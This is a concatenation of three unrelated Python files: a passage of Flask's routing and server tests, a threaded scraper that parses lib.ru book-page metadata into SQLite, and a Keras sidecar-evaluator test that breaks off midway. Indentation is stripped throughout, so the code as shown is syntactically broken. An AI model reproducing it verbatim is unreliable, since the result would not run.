def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 0.15 warning about name mismatch
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore", "Current server name", UserWarning, "flask.app"
)
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.filterwarnings("ignore::pytest.PytestUnhandledThreadExceptionWarning")
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this one to
# fail when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
raise AssertionError()  # unreachable: the form access above should raise 413 first
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
raise AssertionError()  # unreachable: the form access above should raise 413 first
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
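# flask._request_ctx_stack and flask._app_ctx_stack are private internals
# (deprecated in later Flask releases); the test above touches them directly to
# check that a context preserved by debug mode is popped exactly once.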
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore", "Current server name", UserWarning, "flask.app"
)
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == (404 if matching else 204)
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
|
parse_works_metadata_from_htmls_to_db.py
|
#!/usr/bin/env python3
from urllib.parse import urlsplit, parse_qs, parse_qsl, unquote, quote, urljoin, urlencode, quote_plus
import json
import time
import sqlite3
import sqlalchemy.exc
import os
import threading, queue
from pathlib import Path
from typing import Optional, Union
from dataclasses import dataclass
import re
import parsel
from bs4 import BeautifulSoup, Comment, NavigableString, Tag
import html as html_
import db
lock = threading.RLock()
q = queue.Queue(maxsize=20) # fifo_queue
db_q = queue.Queue(maxsize=20)
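# Bounded queues (maxsize=20) provide backpressure: the reader loop in main()
# waits while q is full, and the 20 parser worker threads block on db_q.put()
# whenever the single db_save consumer falls behind.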
categories_cached = [(r['id'], r['slug'], r['name']) for r in db.texts_categories_names.find()]
@dataclass
class D:
"""
from collections import namedtuple
d = namedtuple('D', 'author title date translator source other text categories')
"""
tid: int
author: str = None
translator: str = None
categories = []
year = None
desc = None
author_tag = None
year_tag = None
annotation_tag = None
class Parse_metadata_from_html:
def get_desc_block(self, soup):
for t in soup.find_all('table'):
for e in t.find_all(
text=lambda x: isinstance(x, Comment) and 'Блок описания произведения (слева вверху)' in x):
return t
def get_li_block(self, desc_block) -> Optional[tuple]:
# for ul in desc_block.find_all('ul'):
# for _ in ul.find_all(text=lambda x: isinstance(x, NavigableString) and 'Оставить комментарий' in x):
ul = desc_block.find_all('ul')[0]
li = ul.find_all('li')
return li
def get_annotation_block(self, desc_block):
for e in desc_block.find_all(text=lambda x: isinstance(x, NavigableString) and 'Аннотация:' in x):
li = e.find_parent('li')
z = e
if e.parent.name == 'font':
z = e.parent
if e.parent.parent.name == 'b':
z = e.parent.parent
z.extract()
li.find('i').unwrap()
return li
def parse_year(self, year_line):
for y in year_line.find_all(text=lambda x: isinstance(x, NavigableString) and 'Год:' in x):
self.d.year = y.text.split('Год:')[1].strip()
break
def parse_annotation(self, annotation_):
# todo
if annotation_ and annotation_.text.strip() != '':
# self.d.desc = annotation_.text  # strips tags, replaces <br> with \n
if m := re.search(r'<li>(\s|<br[\s/]*>|\.)*(.*?)(\s|<br[\s/]*>)*</li>', str(annotation_), flags=re.DOTALL):
t = m.group(2)
if not re.search(r'^[.,?!]*$', t):  # skip values that are empty or punctuation-only
self.d.desc = t
# self.d.year=str(annotation_)
def parse_categories(self, categories_line):
if x := categories_line.find('a'):
if x.attrs.get('href', '').startswith("/type/"):
self.d.categories = [(a.attrs.get('href'), a.text) for a in categories_line.find_all('a')
if a.attrs.get('href').startswith("/")]
for e in categories_line.find_all('font', attrs={'size': '-1'}):
e.unwrap()
def parse_author(self, author_line):
r = self.r
"""<li><a href="http://az.lib.ru/d/defo_d/">Дефо Даниель</a>
(перевод: Я . . . . въ Л . . . . .нъ)
(<u>yes@lib.ru</u>)
</li>"""
author_line_s = re.sub(r'\(?[\w.]+@\w+\.ru\)?', '', author_line.text)
# if email := author_line.find(text=lambda x: isinstance(x, NavigableString) and '@lib.ru' in x):
# email.extract()
for a in author_line.find_all('a'):
if r['name'].replace('_', ' ') == r['litarea']:
if a.text.strip() not in ([r['litarea'], r['name']]):
self.d.author = a.text.strip()
break
elif href := a.attrs.get('href'):
if urlsplit(href).path.rstrip('/') == r['author_slug']:
self.d.author = r['name_for_WS']
break
else:
print('href != author_slug')
else:
print('no <a> in author line')
if author_ := re.search(r'(.+?)\s*\(перевод:\s*(.+?)\s*\)', author_line_s):
self.d.author = author_.group(1)
else:
raise RuntimeError('tid:', self.r['tid'], 'author not parsed')
# if translator := re.search(r'\(перевод:\s*(.+?)\s*\)', author_line_s):
# d.translator = translator.group(1)
# if email := author_line.find(text=lambda x: isinstance(x, NavigableString) and '@lib.ru' in x):
# email.extract()
def parse_translator(self, annotation_, author_line):
r = self.r
"""Перевод <a href="http://az.lib.ru/z/zhurawskaja_z_n/">Зинаиды Журавской</a>"""
# for s in annotation_.descendants:
# if isinstance(s, NavigableString) and 'Перевод ' in s \
# and isinstance(s.next_element, Tag) and s.next_sibling.name == 'a':
# a = s.next_sibling
# if translator := re.search(r'(.+?)\s*\(Перевод \s*(.+?)\s*\)', annotation_):
# d.translator = translator.group(1)
if annotation_:
for e in annotation_.find_all('i'):
for s in e.contents:
if isinstance(s, NavigableString) and 'Перевод ' in s:
if isinstance(s.next_element, Tag) and s.next_element.name == 'a':
a_ = s.next_element
href = a_.attrs.get('href')
if href and a_.attrs.get('href') != '':
if r := db.all_tables.find_one(
author_slug=urlsplit(href.strip()).path.replace('/editors', '').rstrip('/')):
self.d.translator = r['name_for_WS']
break
else:
pass
a_.unwrap()
if self.d.translator is None:
# http://az.lib.ru/d/degen_e_w/
# raise RuntimeError('tid:', self.r['tid'], 'translator not resolved from <a>')
print('tid:', self.r['tid'], 'translator not resolved from <a>')
self.d.translator = e.text
e.extract()
# elif translator_ := re.search(r'Перевод (.+)', s):
# self.d.translator = translator_.group(1)
# s.extract()
# else:
# raise RuntimeError('tid:', self.r['tid'], 'translator not resolved')
else:
self.d.translator = s
s.extract()
if e.contents == []:
e.extract()
if self.d.translator is None:
if translator_ := re.search(r'\(перевод:\s*(.+?)\s*\)', author_line.text):
self.d.translator = translator_.group(1)
else:
# print('no <a> in author line')
pass
is_cat_transl = [True for slug, name in self.d.categories if name == 'Переводы']
if is_cat_transl and self.d.translator is None:
# raise RuntimeError('tid:', self.r['tid'], 'translator not resolved')
print('tid:', self.r['tid'], 'translator not resolved', r['text_url'])
elif not is_cat_transl and self.d.translator:
# raise RuntimeError('tid:', self.r['tid'], 'translator present but no translation category')
print('tid:', self.r['tid'], 'translator present but no translation category', r['text_url'])
def parse(self, r):
self.r = r
self.d = D(tid=r['tid'])
soup = BeautifulSoup(r['html'], 'html5lib')
desc_block = self.get_desc_block(soup)
annotation_ = self.get_annotation_block(desc_block)
li = self.get_li_block(desc_block)
if len(li) not in [5, 6]:
# raise RuntimeError('tid:', self.r['tid'], 'description <li> count is not 6')
print('tid:', self.d.tid, 'description <li> count is not 5-6')
return
else:
author_line, year_line, categories_line = li[1], li[2], li[4]
for store, tag in zip(('author_tag', 'year_tag', 'annotation_tag'), (author_line, year_line, annotation_)):
if tag:
t = re.search(r'<li>(\s|<br[\s/]*>)*(.*?)(\s|<br[\s/]*>)*</li>', str(tag), flags=re.DOTALL)
if t.group(2) != '':
self.d.__setattr__(store, t.group(2))
self.parse_categories(categories_line)
self.parse_author(author_line)
self.parse_translator(annotation_, author_line)
self.parse_year(year_line)
self.parse_annotation(annotation_)
return self.d
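# Minimal usage sketch (hypothetical `row`; the parser reads the keys 'tid',
# 'html', 'name', 'litarea', 'author_slug', 'name_for_WS' and 'text_url',
# as supplied by the db1['all_tables'] rows iterated in main() below):
#
#   parser = Parse_metadata_from_html()
#   d = parser.parse(row)
#   if d:
#       print(d.author, d.translator, d.year, d.desc)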
tids = []
def add_categories(d, categories_cached):
tid = d.tid
if tid in tids:
raise RuntimeError('tid:', tid, 'tid already processed, duplicate across threads')
# print('oops', tid)
else:
tids.append(tid)
categories_to_add = []
for slug_d, name_d in d.categories:
for cid, slug, name in categories_cached:
if slug == slug_d:
break
else:
# print('to db insert', d.tid)
db.texts_categories_names.insert({'slug': slug_d, 'name': name_d}, ensure=True)
# print('to db find_one', d.tid)
cid = db.texts_categories_names.find_one(slug=slug_d)['id']
categories_cached.append([cid, slug_d, name_d])
categories_to_add.append({'tid': tid, 'category_id': cid})
try:
# print('to db insert_many', d.tid)
db.texts_categories.insert_many(categories_to_add, ensure=True)
except sqlalchemy.exc.IntegrityError:
# print('to db delete', d.tid)
db.texts_categories.delete(tid=tid)
# print('to db insert_many', d.tid)
db.texts_categories.insert_many(categories_to_add, ensure=True)
def parse_metadata_from_html_parsel(tid, html):
"""
# todo
"""
d = D(tid=tid)
dom = parsel.Selector(html)
desc_block = dom.xpath(
'//table//comment()[contains(.,"Блок описания произведения (слева вверху")]/ancestor::table')
info_li = desc_block.xpath('.//li/a[contains(.,"Оставить комментарий")]/ancestor::ul//li')
if len(info_li) != 6:
print('tid:', tid, 'description <li> count is not 6')
return
author_ = info_li[1]
year_ = info_li[2]
categories_ = info_li[3]
annotation_ul = desc_block.xpath('./a[contains(.,"Аннотация:")]/ancestor::ul')
categories_ = desc_block.xpath('.//a[starts-with(@href,"/type/")]/ancestor::li//a').css('a[href^="/"]')
categories = [(z.css('::attr(href)').get(), z.css('::text').get()) for z in categories_]
return d
def main():
# from collections import namedtuple
# Cat = namedtuple('Cat', '')
# for r in db.all_tables.find(db.all_tables.table.c.wiki_page.isnot(None)):
# for r in db.all_tables.find(wiki=None):
# r = db.all_tables.find_one(tid=7487)
# tid = 7488 # http://az.lib.ru/d/defo_d/text_0014.shtml annotation contains <i>Перевод <a href="http://az.lib.ru/z/zhurawskaja_z_n/">Зинаиды Журавской</a></i>
tid = 7487 # http://az.lib.ru/d/defo_d/text_0013_robinson_crusoe-oldorfo.shtml author line reads "Дефо Даниель (перевод: Я . . . . въ Л . . . . .нъ)"
# tid = 7
def db_save():
while True:
while db_q.empty():
time.sleep(1)
d = db_q.get()
print('to db', d.tid)
with lock:
add_categories(d, categories_cached)
db.htmls.update(
{'tid': d.tid, 'author': d.author, 'translator': d.translator, 'year': d.year, 'desc': d.desc,
'author_tag': d.author_tag, 'year_tag': d.year_tag, 'annotation_tag': d.annotation_tag},
['tid'], ensure=True)
db_q.task_done()
def worker():
while True:
while q.empty():
time.sleep(1)
r = q.get()
print(r['tid'])
parser = Parse_metadata_from_html()
d = parser.parse(r)
if d:
db_q.put(d)
q.task_done()
threading.Thread(target=db_save, name='db_save', daemon=True).start()
# turn-on the worker thread
for r in range(20):
threading.Thread(target=worker, daemon=True).start()
import dataset
db1 = dataset.connect('sqlite:////home/vladislav/var/db/from_lib_ru.sqlite',
engine_kwargs={'connect_args': {'check_same_thread': False}})
# for tid in [5643]:
# for r in db.db_htmls.find(db.db_htmls.table.c.wiki.isnot(None)):
for r in db1['all_tables'].find(author=None):
# for r in db.all_tables.find(tid =654):
while q.full():
time.sleep(1)
q.put(r)
# block until all tasks are done
q.join()
db_q.join()
print('All work completed')
if __name__ == '__main__':
main()
|
sidecar_evaluator_test.py
|
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test covering sidecar_evaluator.py."""
import enum
import os
import threading
import time
from absl.testing import parameterized
import keras
from keras.distribute import sidecar_evaluator as sidecar_evaluator_lib
from keras.optimizer_v2 import gradient_descent
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow.python.platform import tf_logging as logging # pylint: disable=g-direct-tensorflow-import
_BATCH_SIZE = 32
class TestModel(keras.Model):
def __init__(self):
super().__init__(name='test_model')
self.dense = keras.layers.Dense(10)
def call(self, inputs):
return self.dense(inputs)
class DictMetric(keras.metrics.MeanSquaredError):
def result(self):
res = super().result()
return {'mean_squared_error_1': res, 'mean_squared_error_2': res}
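# DictMetric returns a dict from result(), so one metric instance yields two
# logged values; assertSummaryEventsWritten below expects both the
# 'mean_squared_error_1' and 'mean_squared_error_2' summary tags.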
class ModelType(enum.Enum):
SEQUENTIAL = 'sequential'
SUBCLASS = 'subclass'
def _test_model_builder(model_type: ModelType, compile_model, build_model):
if model_type == ModelType.SEQUENTIAL:
model = keras.Sequential([keras.layers.Dense(10)])
elif model_type == ModelType.SUBCLASS:
model = TestModel()
if compile_model:
model.compile(
gradient_descent.SGD(),
loss='mse',
metrics=[keras.metrics.CategoricalAccuracy(),
DictMetric()])
if build_model:
model.build((None, 32))
return model
class SidecarEvaluatorTest(tf.test.TestCase, parameterized.TestCase):
def assertSummaryEventsWritten(self, log_dir):
# Asserts summary files do get written when log_dir is provided.
summary_files = tf.io.gfile.listdir(log_dir)
self.assertNotEmpty(
summary_files, 'Summary should have been written and '
'log_dir should not be empty.')
# Asserts the content of the summary file.
event_pb_written = False
event_tags = []
for summary_file in summary_files:
for event_pb in tf.compat.v1.train.summary_iterator(
os.path.join(log_dir, summary_file)):
if event_pb.step > 0:
self.assertEqual(event_pb.step, 32)
event_tags.append(event_pb.summary.value[0].tag)
event_pb_written = True
self.assertCountEqual(event_tags, [
'evaluation_categorical_accuracy_vs_iterations',
'evaluation_loss_vs_iterations',
'evaluation_mean_squared_error_1_vs_iterations',
'evaluation_mean_squared_error_2_vs_iterations',
])
# Verifying at least one non-zeroth step is written to summary.
self.assertTrue(event_pb_written)
def assertModelsSameVariables(self, model_a, model_b):
# Check both have the same number of variables.
self.assertEqual(len(model_a.variables), len(model_b.variables))
# Check variable values to be equal.
for var_a, var_b in zip(model_a.variables, model_b.variables):
self.assertAllEqual(var_a.numpy(), var_b.numpy())
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'], model_type=[ModelType.SEQUENTIAL,
ModelType.SUBCLASS]))
def testIterationsNotSavedWillRaiseError(self, model_type):
model = _test_model_builder(
model_type=model_type, compile_model=False, build_model=True)
checkpoint_dir = self.get_temp_dir()
checkpoint = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
checkpoint_manager.save()
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
model, data=None, checkpoint_dir=checkpoint_dir)
with self.assertRaisesRegex(
RuntimeError, '`iterations` cannot be loaded '
'from the checkpoint file.'):
sidecar_evaluator.start()
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'], model_type=[ModelType.SEQUENTIAL,
ModelType.SUBCLASS]))
def testModelNotBuiltRaiseError(self, model_type):
model = _test_model_builder(
model_type=model_type, compile_model=False, build_model=False)
checkpoint_dir = self.get_temp_dir()
checkpoint = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
checkpoint_manager.save()
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
model, data=None, checkpoint_dir=checkpoint_dir)
with self.assertRaisesRegex(AssertionError, 'Nothing to load.'):
sidecar_evaluator.start()
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testSidecarEvaluatorOutputsSummary(self, model_type, build_model):
# Create a model with synthetic data, and fit for one epoch.
model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=False)
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(32)
model.fit(dataset, epochs=1)
# Save a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), 'ckpt')
log_dir = os.path.join(self.get_temp_dir(), 'summary')
logging.info('checkpoint_dir = %s, log_dir = %s', checkpoint_dir, log_dir)
checkpoint = tf.train.Checkpoint(
model=model, optimizer=model.optimizer)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
logging.info('Checkpoint manager saved to: %s', checkpoint_manager.save())
self.assertNotEmpty(
tf.io.gfile.listdir(checkpoint_dir),
'Checkpoint should have been written and '
'checkpoint_dir should not be empty.')
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have a sidecar_evaluator evaluate once.
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1,
callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir)])
sidecar_evaluator.start()
# Eval model has been restored to the same state as the original model, so
# their weights should match. If not, restoration of the model didn't
# work.
self.assertModelsSameVariables(model, eval_model)
self.assertSummaryEventsWritten(os.path.join(log_dir, 'validation'))
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testSidecarEvaluatorOutputsSummarySavedWithCallback(
self, model_type, build_model):
checkpoint_dir = os.path.join(self.get_temp_dir(), 'checkpoints')
log_dir = os.path.join(self.get_temp_dir(), 'summary')
# Create a model with synthetic data, and fit for one epoch.
model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=False)
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(_BATCH_SIZE)
save_callback = keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_dir, 'ckpt-{epoch}'),
save_weights_only=True)
model.fit(dataset, epochs=1, callbacks=[save_callback])
self.assertNotEmpty(
tf.io.gfile.listdir(checkpoint_dir),
'Checkpoint should have been written and '
'checkpoint_dir should not be empty.')
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have a sidecar_evaluator evaluate once.
